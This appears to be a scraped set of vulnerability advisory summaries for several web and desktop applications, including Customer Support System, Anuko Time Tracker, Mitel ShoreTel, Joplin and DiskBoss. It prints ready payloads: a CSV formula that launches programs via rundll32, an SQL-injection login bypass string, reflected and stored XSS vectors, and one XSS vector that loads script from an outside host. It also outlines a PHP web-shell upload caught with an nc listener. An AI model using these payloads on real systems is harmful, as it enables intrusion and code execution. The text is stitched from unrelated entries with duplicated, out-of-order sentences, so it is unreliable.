A stored XSS vulnerability exists in the Customer Support System 1.0 application. An attacker can exploit this vulnerability by navigating to http://TARGET/customer_support/index.php?page=department_list, clicking on new Department, and adding the XSS payload into the 'description' parameter value. Browsing to the post will trigger the XSS payload.
CSV Injection (aka Excel Macro Injection or Formula Injection) exists in Reports feature in Anuko Time Tracker v1.19.23.5311 via User, Project and Note data field that is mistreated while exporting to a CSV file. To exploit this vulnerability: 1. Login to the application, goto 'User' module and edit the user 2. Inject the payload *=rundll32|'URL.dll,OpenURL calc.exe'!A* in the 'Name' field 3. Goto 'Project' module, add a new project with the same malicious payload in the 'Name' field 4. Goto 'Time' module, select our created User, Project and again enter the same payload in 'Note' field 5. Enter the rest of the details and click 'Submit' 6. Now goto 'Reports' click Generateand download the CSV file 7. Open the CSV file, allow all popups and our payload is executed (calculator is opened).
The conferencing component on Mitel ShoreTel 19.46.1802.0 devices could allow an unauthenticated attacker to conduct a reflected cross-site scripting attack (XSS) via the PATH_INFO to index.php, due to insufficient validation for the time_zone object in the HOME_MEETING& page. Vulnerable payload /index.php/%22%20onmouseover=alert(document.domain)%20?page=HOME Vulnerability is in the HOME_MEETINGS& page, where a time_zone dropdown object is located. Upon executing the payload, the exploit executes when the mouse is rolled over the dropdown menu object.
This script will perform an automatic login using sql injection "'OR 1 = 1 limit 1 #" and will create a new car in the archive, assigning a PHP file instead of the image of the car itself. This car, having "AAAAAAAAAAA" as a brand, will be the first among those displayed and we will use the file just uploaded with a phpshell on the victim system. On the Attacker machine, the user must listen with NC on a port.
An XSS issue in Joplin for desktop v1.2.6 allows a link tag in a note to bypass the HTML filter. The payload for the exploit is <link rel=import href="data:text/html,<script>alert(XSS)</script> <script src="//brutelogic.com.br/1.js# </script>
This vulnerability could permit executing code during startup or reboot with the escalated privileges.
DiskBoss v11.7.28 and its related products are vulnerable to Unquoted Service path. Any low privileged user can elevate their privileges using any of these services.
This vulnerability could permit executing code during startup or reboot with the escalated privileges.
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
Services By CQR